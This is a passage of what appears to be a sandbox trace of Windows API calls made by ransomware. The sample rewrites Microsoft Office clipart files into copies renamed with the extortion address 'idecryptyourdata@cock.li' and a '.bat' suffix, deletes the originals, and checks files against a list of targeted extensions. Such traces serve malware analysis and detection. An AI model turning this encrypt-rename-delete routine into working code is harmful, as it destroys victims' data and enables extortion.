Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0063.198] GetLastError () returned 0x0 [0063.198] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4fe6, lpOverlapped=0x0) returned 1 [0063.199] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x4ff0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x4ff0, lpOverlapped=0x0) returned 1 [0063.200] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.200] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.200] SetEndOfFile (hFile=0x340) returned 1 [0063.200] CloseHandle (hObject=0x340) returned 1 [0063.201] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.201] SetEndOfFile (hFile=0x370) returned 1 [0063.202] CloseHandle (hObject=0x370) returned 1 [0063.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.202] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif")) returned 1 [0063.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.203] lstrlenW (lpString=".doc") returned 4 [0063.203] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0063.203] lstrlenW (lpString=".docx") returned 5 [0063.203] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0063.203] lstrlenW (lpString=".pdf") returned 4 [0063.203] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0063.203] lstrlenW (lpString=".xls") returned 4 [0063.203] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0063.203] lstrlenW (lpString=".xlsx") returned 5 [0063.203] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0063.203] lstrlenW (lpString=".ppt") returned 4 [0063.203] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0063.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.203] lstrlenW (lpString=".zip") returned 4 [0063.203] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0063.203] lstrlenW (lpString=".rar") returned 4 [0063.203] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0063.203] lstrlenW (lpString=".bz2") returned 4 [0063.203] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0063.203] lstrlenW (lpString=".7z") returned 3 [0063.203] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0063.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.203] lstrlenW (lpString=".dbf") returned 4 [0063.203] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0063.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.203] lstrlenW (lpString=".1cd") returned 4 [0063.203] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0063.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.203] lstrlenW (lpString=".jpg") returned 4 [0063.203] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0063.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.204] lstrlenW (lpString=".doc") returned 4 [0063.204] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0063.204] lstrlenW (lpString=".docx") returned 5 [0063.204] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0063.204] lstrlenW (lpString=".pdf") returned 4 [0063.204] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0063.204] lstrlenW (lpString=".xls") returned 4 [0063.204] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0063.204] lstrlenW (lpString=".xlsx") returned 5 [0063.204] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0063.204] lstrlenW (lpString=".ppt") returned 4 [0063.204] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0063.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.204] lstrlenW (lpString=".zip") returned 4 [0063.204] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0063.204] lstrlenW (lpString=".rar") returned 4 [0063.204] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0063.204] lstrlenW (lpString=".bz2") returned 4 [0063.204] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0063.204] lstrlenW (lpString=".7z") returned 3 [0063.204] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0063.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.204] lstrlenW (lpString=".dbf") returned 4 [0063.204] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0063.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.204] lstrlenW (lpString=".1cd") returned 4 [0063.204] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0063.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 68 [0063.204] lstrlenW (lpString=".jpg") returned 4 [0063.204] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0063.205] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0063.205] lstrlenW (lpString="BD19582_.GIF") returned 12 [0063.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.205] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=15733) returned 1 [0063.205] CloseHandle (hObject=0x370) returned 1 [0063.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif")) returned 0x220 [0063.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.205] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.205] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0063.206] GetLastError () returned 0x0 [0063.206] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x3d75, lpOverlapped=0x0) returned 1 [0063.207] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x3d80, lpOverlapped=0x0) returned 1 [0063.208] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.208] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.208] SetEndOfFile (hFile=0x340) returned 1 [0063.209] CloseHandle (hObject=0x340) returned 1 [0063.212] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.212] SetEndOfFile (hFile=0x370) returned 1 [0063.213] CloseHandle (hObject=0x370) returned 1 [0063.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.213] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif")) returned 1 [0063.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.214] lstrlenW (lpString=".doc") returned 4 [0063.214] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0063.214] lstrlenW (lpString=".docx") returned 5 [0063.214] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0063.214] lstrlenW (lpString=".pdf") returned 4 [0063.214] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0063.214] lstrlenW (lpString=".xls") returned 4 [0063.214] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0063.214] lstrlenW (lpString=".xlsx") returned 5 [0063.214] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0063.214] lstrlenW (lpString=".ppt") returned 4 [0063.214] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0063.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.214] lstrlenW (lpString=".zip") returned 4 [0063.214] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0063.214] lstrlenW (lpString=".rar") returned 4 [0063.214] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0063.214] lstrlenW (lpString=".bz2") returned 4 [0063.214] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0063.214] lstrlenW (lpString=".7z") returned 3 [0063.214] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0063.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.214] lstrlenW (lpString=".dbf") returned 4 [0063.214] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0063.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.214] lstrlenW (lpString=".1cd") returned 4 [0063.214] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0063.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.214] lstrlenW (lpString=".jpg") returned 4 [0063.215] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0063.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.215] lstrlenW (lpString=".doc") returned 4 [0063.215] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0063.215] lstrlenW (lpString=".docx") returned 5 [0063.215] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0063.215] lstrlenW (lpString=".pdf") returned 4 [0063.215] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0063.215] lstrlenW (lpString=".xls") returned 4 [0063.215] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0063.215] lstrlenW (lpString=".xlsx") returned 5 [0063.215] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0063.215] lstrlenW (lpString=".ppt") returned 4 [0063.215] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0063.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.215] lstrlenW (lpString=".zip") returned 4 [0063.215] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0063.215] lstrlenW (lpString=".rar") returned 4 [0063.215] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0063.215] lstrlenW (lpString=".bz2") returned 4 [0063.215] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0063.215] lstrlenW (lpString=".7z") returned 3 [0063.215] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0063.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.215] lstrlenW (lpString=".dbf") returned 4 [0063.215] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0063.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.215] lstrlenW (lpString=".1cd") returned 4 [0063.215] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0063.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 68 [0063.216] lstrlenW (lpString=".jpg") returned 4 [0063.216] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0063.216] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0063.216] lstrlenW (lpString="BD19695_.WMF") returned 12 [0063.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.216] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=12982) returned 1 [0063.216] CloseHandle (hObject=0x370) returned 1 [0063.216] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf")) returned 0x220 [0063.216] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.217] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.217] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0063.217] GetLastError () returned 0x0 [0063.217] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x32b6, lpOverlapped=0x0) returned 1 [0063.219] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x32c0, lpOverlapped=0x0) returned 1 [0063.220] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.221] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.221] SetEndOfFile (hFile=0x340) returned 1 [0063.221] CloseHandle (hObject=0x340) returned 1 [0063.222] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.222] SetEndOfFile (hFile=0x370) returned 1 [0063.649] CloseHandle (hObject=0x370) returned 1 [0063.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.650] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf")) returned 1 [0063.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.650] lstrlenW (lpString=".doc") returned 4 [0063.650] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.650] lstrlenW (lpString=".docx") returned 5 [0063.650] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.650] lstrlenW (lpString=".pdf") returned 4 [0063.650] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.650] lstrlenW (lpString=".xls") returned 4 [0063.650] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.650] lstrlenW (lpString=".xlsx") returned 5 [0063.650] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.650] lstrlenW (lpString=".ppt") returned 4 [0063.650] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.650] lstrlenW (lpString=".zip") returned 4 [0063.650] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.651] lstrlenW (lpString=".rar") returned 4 [0063.651] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString=".bz2") returned 4 [0063.651] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString=".7z") returned 3 [0063.651] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.651] lstrlenW (lpString=".dbf") returned 4 [0063.651] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.651] lstrlenW (lpString=".1cd") returned 4 [0063.651] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.651] lstrlenW (lpString=".jpg") returned 4 [0063.651] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.651] lstrlenW (lpString=".doc") returned 4 [0063.651] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString=".docx") returned 5 [0063.651] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.651] lstrlenW (lpString=".pdf") returned 4 [0063.651] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString=".xls") returned 4 [0063.651] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.651] lstrlenW (lpString=".xlsx") returned 5 [0063.651] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.651] lstrlenW (lpString=".ppt") returned 4 [0063.651] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.651] lstrlenW (lpString=".zip") returned 4 [0063.651] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.651] lstrlenW (lpString=".rar") returned 4 [0063.651] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString=".bz2") returned 4 [0063.651] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.651] lstrlenW (lpString=".7z") returned 3 [0063.652] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.652] lstrlenW (lpString=".dbf") returned 4 [0063.652] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.652] lstrlenW (lpString=".1cd") returned 4 [0063.652] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0063.652] lstrlenW (lpString=".jpg") returned 4 [0063.652] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.652] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0063.652] lstrlenW (lpString="BL00262_.WMF") returned 12 [0063.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.652] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=2556) returned 1 [0063.652] CloseHandle (hObject=0x370) returned 1 [0063.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf")) returned 0x220 [0063.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.653] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.653] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 